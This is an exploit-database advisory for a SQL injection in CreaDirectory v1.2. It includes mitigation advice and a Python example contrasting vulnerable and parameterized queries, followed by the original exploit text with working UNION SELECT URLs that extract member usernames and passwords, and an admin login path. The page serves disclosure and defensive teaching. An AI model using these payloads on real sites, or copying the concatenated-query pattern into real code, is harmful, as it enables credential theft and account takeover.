vendor:
by: CyberGhost
CVSS: 5.5 (MEDIUM)
Remote SQL Injection
CWE: 89
Product Name:
Affected Version From: CreaDirectory v1.2
Affected Version To: CreaDirectory v1.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

CreaDirectory v1.2 Remote SQL Injection Vulnerability

The CreaDirectory v1.2 script is vulnerable to remote SQL injection. An attacker can exploit this vulnerability to execute arbitrary SQL commands and retrieve sensitive information from the database. The vulnerability exists in the 'error.asp' page, where the 'id' parameter is not properly sanitized before being used in a SQL query.

Mitigation:

To mitigate this vulnerability, sanitize user input before using it in SQL queries. Implementing parameterized queries or prepared statements also helps prevent SQL injection attacks.
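An added illustration of the mitigation above, not code from CreaDirectory or from the advisory: the page does not show error.asp, so this Python/sqlite3 model assumes a constructed schema (a 16-column errors table, and a members table with user_name and ipassword) and uses hypothetical function names. It contrasts string concatenation with integer validation plus a bound parameter, using the id value from the advisory as input.

```python
import sqlite3


def make_db():
    """Constructed stand-in data; the real CreaDirectory schema is not on the page."""
    db = sqlite3.connect(":memory:")
    # 16 columns in total (id + c1..c15), matching the 16-column UNION in the advisory.
    cols = ", ".join(f"c{i} TEXT" for i in range(1, 16))
    db.execute(f"CREATE TABLE errors (id INTEGER, {cols})")
    db.execute("INSERT INTO errors (id, c3) VALUES (1, 'Page not found')")
    db.execute("CREATE TABLE members (user_name TEXT, ipassword TEXT)")
    db.execute("INSERT INTO members VALUES ('admin', 'constructed-secret')")
    return db


def title_vulnerable(db, raw_id):
    # 'Before' pattern: the id value is concatenated into the SQL text,
    # so anything after the number is parsed as part of the statement.
    row = db.execute("SELECT * FROM errors WHERE id = " + raw_id).fetchone()
    return row[3] if row else None  # column 3 is assumed to feed the page title


def title_hardened(db, raw_id):
    # 1) Allow-list validation: id must be a short, plain ASCII integer.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        return None  # the caller should answer with a generic error page
    # 2) Parameterized query: the value is bound and never parsed as SQL.
    row = db.execute(
        "SELECT c3 FROM errors WHERE id = ?", (int(raw_id),)
    ).fetchone()
    return row[0] if row else None


# The id value from the advisory, with '+' decoded to spaces as a web server would.
ADVISORY_ID = "-1 union select 0,1,2,user_name,4,5,6,7,8,9,0,1,2,3,4,5 from members"

if __name__ == "__main__":
    db = make_db()
    for raw in ("1", ADVISORY_ID):
        print(repr(raw[:20]), "vulnerable ->", title_vulnerable(db, raw))
        print(repr(raw[:20]), "hardened   ->", title_hardened(db, raw))
```

Validation and binding are independent layers: the bound query alone already treats the whole advisory string as a single value that matches no row, and the integer check rejects it before the database is touched.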

Exploit-DB raw data:

#Title  : CreaDirectory v1.2 Remote SQL Injection Vulnerability
#Author : CyberGhost
#Demo Page   : http://www.creadirectory.com
#Script Page : http://www.creascripts.com/creadirectory.asp

#Vuln.

#Username : /error.asp?id=-1+union+select+0,1,2,user_name,4,5,6,7,8,9,0,1,2,3,4,5+from+members
#Password : /error.asp?id=-1+union+select+0,1,2,ipassword,4,5,6,7,8,9,0,1,2,3,4,5+from+members

#Admin Login : /admin.asp

#Info : Username and Password in browser title !
====================================

Thanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - KinSize - BolivaR - kerem125 - by_emR3

And All TURKISH HACKERS !

# milw0rm.com [2007-04-19]